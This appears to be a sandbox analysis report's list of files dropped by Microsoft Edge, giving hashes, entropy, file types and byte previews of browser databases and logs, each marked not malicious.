                                                                                                                                                                                                                                                                                  MD5:B63FD19F85AF4B6871F43FF7BE5116AD
                                                                                                                                                                                                                                                                                  SHA1:02218BEB2C1208EEBE03742649A43657E7780905
                                                                                                                                                                                                                                                                                  SHA-256:65350C3039F5A058B14985AA409173570EDE0F9AE0335C57F0E04002D8AE6DC5
                                                                                                                                                                                                                                                                                  SHA-512:233D0C3EBDE917405C0F71437F5140C07C036AB4BB974406ABCE6A7EE89DC9EE291B47F93482797603FC0E302AD58CBBF141437C7C92D1EE464890F3791BAAAB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator........m...............!'ASSET:arbitration_priority_list........6QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7.*........
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3202460253800455
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                                                                                                                                                  MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                                                                                                                                                  SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                                                                                                                                                  SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                                                                                                                                                  SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.46274412328618814
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5b:TouQq3qh7z3bY2LNW9WMcUvBuZ
                                                                                                                                                                                                                                                                                  MD5:D851BCA18B366D62795B375E1C845641
                                                                                                                                                                                                                                                                                  SHA1:C56D516807D7616675F61153562DAF86A4B8B9A8
                                                                                                                                                                                                                                                                                  SHA-256:91BFF3C76FAB0154935341048541589B6DE20D0DD91CA08711473654F1AC1EB7
                                                                                                                                                                                                                                                                                  SHA-512:70EDCB27B1ECC2F04AE8BC53FC7C313F47E0F4E8AD990F4C73BE7147693401ABC525DC07C3FDCB0EA7AFCE627D624805E22C9502AB3117F704755761B2E8783D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNlP:Ls3
                                                                                                                                                                                                                                                                                  MD5:1702D8B35CE13CF0025652A466DD7422
                                                                                                                                                                                                                                                                                  SHA1:19185C64739725A0DFAAE6855C6185B1D96BBB50
                                                                                                                                                                                                                                                                                  SHA-256:580D2ED7208DD7D94DF6212605AC37C251CCC764D3C1135FEB2E22A2142F4EC9
                                                                                                                                                                                                                                                                                  SHA-512:D0684896BCD77029A46D7E339CA99D4DEBD609DCCCB3568B65AA4AA9A3D7F23DFCD9A37D9E131FE91EDF404E5F7B139F8A70DC49E86E68D86C398A45A3A7A333
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..........................................#k./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):346
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.182540726791193
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCmefQWM+q2Pwkn23oH+TcwtnG2tMsIFUtfCmFfG1Zmw5CmFfQWMVkwOwkn23p:7VIfQ+vYfYebn9GFUtfzG1/5zQV5JfYi
                                                                                                                                                                                                                                                                                  MD5:B996068EEE72D032F0C0FCCB4E382FB1
                                                                                                                                                                                                                                                                                  SHA1:36F9D26A22F96364C100365BD4254BCBA8B066C7
                                                                                                                                                                                                                                                                                  SHA-256:3FC51D62DBDBE0153CBEDA22E4EBFAF7F5260B4AE4B24F91E3CAB8E54F5BC8F5
                                                                                                                                                                                                                                                                                  SHA-512:64BF5EDAC680B19AC5C2F332814D8635EADF7D8980FBF9C11E72EADB3248D42B9769181ADB7644B050254404769BE0BE4A58D3AC29A1A41BAE3E7849295346B8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:00.961 19ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/03-17:33:00.962 19ac Recovering log #3.2025/01/03-17:33:00.962 19ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):346
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.182540726791193
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCmefQWM+q2Pwkn23oH+TcwtnG2tMsIFUtfCmFfG1Zmw5CmFfQWMVkwOwkn23p:7VIfQ+vYfYebn9GFUtfzG1/5zQV5JfYi
                                                                                                                                                                                                                                                                                  MD5:B996068EEE72D032F0C0FCCB4E382FB1
                                                                                                                                                                                                                                                                                  SHA1:36F9D26A22F96364C100365BD4254BCBA8B066C7
                                                                                                                                                                                                                                                                                  SHA-256:3FC51D62DBDBE0153CBEDA22E4EBFAF7F5260B4AE4B24F91E3CAB8E54F5BC8F5
                                                                                                                                                                                                                                                                                  SHA-512:64BF5EDAC680B19AC5C2F332814D8635EADF7D8980FBF9C11E72EADB3248D42B9769181ADB7644B050254404769BE0BE4A58D3AC29A1A41BAE3E7849295346B8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:00.961 19ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/03-17:33:00.962 19ac Recovering log #3.2025/01/03-17:33:00.962 19ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.494709561094235
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
                                                                                                                                                                                                                                                                                  MD5:CF7760533536E2AF66EA68BC3561B74D
                                                                                                                                                                                                                                                                                  SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
                                                                                                                                                                                                                                                                                  SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
                                                                                                                                                                                                                                                                                  SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...i............t...c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6145893892050104
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLqpR+DDNzWjJ0npnyXKUO8+jZdApYUdG4mL:Te8D4jJ/6Up+t1Ui
                                                                                                                                                                                                                                                                                  MD5:3594B82A8A5F27D9806C4685169FBD1C
                                                                                                                                                                                                                                                                                  SHA1:8BBF330AC99B3744C7FEB7CC0334558BBE25C32F
                                                                                                                                                                                                                                                                                  SHA-256:A118D855C2DB6CE65D90C35FC5AFBD0A8C5953400CCE1C185CABF503B0AA3E6A
                                                                                                                                                                                                                                                                                  SHA-512:EF77EAC4D7B9D9706383F2D52B5DE14DE48BC092BA312344141CE4BE6154348D221BE7E7896E8E11D9A5D4C3AC581F41B8A6A2F26982349DD8D4CBDE46D81EFA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.354158294818835
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:zA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:zFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                  MD5:6C62A1B23F8DE6E2442F91D1481DFA51
                                                                                                                                                                                                                                                                                  SHA1:13DF131DCDAD128DAF2B59FF1E5F632EEBF723B5
                                                                                                                                                                                                                                                                                  SHA-256:1620101CC34B68733A383E5D7CB1499A5437320592D84232082BAC7997F93C2E
                                                                                                                                                                                                                                                                                  SHA-512:7FF0444B817008903025CD913EE2AC76F707B5FD4FCD8BDCDAE0B0C919C843913669F32194AC2308A640CB6F511DEA52B556C9738A2F9F0451D9E884F0C8B34C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1..q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380417161679074..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.179484470763226
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCPS9FmRq1wkn23oH+Tcwtk2WwnvB2KLlPCPgAq2Pwkn23oH+Tcwtk2WwnvIF2:7VlFmbfYebkxwnvFL5hAvYfYebkxwnQg
                                                                                                                                                                                                                                                                                  MD5:5B392A08AED40CEC339596FBF2100F6C
                                                                                                                                                                                                                                                                                  SHA1:2D4F1FC04BD9DF60FBE31B45F288F7E5DB18AC82
                                                                                                                                                                                                                                                                                  SHA-256:1AE89B957D8463DB0B16FA1740EA8C578DCF88F2AA07F88D7700F2F14CBC33C6
                                                                                                                                                                                                                                                                                  SHA-512:2CB27809A2E6A35FD26A117F29FEDBA757FA09E8B24B60449AF855A90D1EFC6F8CC4F587BF05E36175A6B9B50EDD05ED2ED7A6CDF79EE4DFEB1DE2616D8DA941
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:32:40.763 1c90 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/03-17:32:41.012 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):358859
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.324611198425938
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rq:C1gAg1zfvS
                                                                                                                                                                                                                                                                                  MD5:37BBD12347093DA0B42352C3930DC605
                                                                                                                                                                                                                                                                                  SHA1:808F62F77086351E4A254EC10E697E28245128E3
                                                                                                                                                                                                                                                                                  SHA-256:C50537EEE35FE353F21F210BD9AFABA8C80A97596A5BC912649BFDE8FCDC7006
                                                                                                                                                                                                                                                                                  SHA-512:3766481C6A57A3A6C2BB56897813335647C507192BFC355B3BB4C57804CE4C9136281B7BDB67FC4BFB889A97A7BC74F6298127C0EBAF94ED89EAF3A9A9284645
                                                                                                                                                                                                                                                                                  Malicious:false
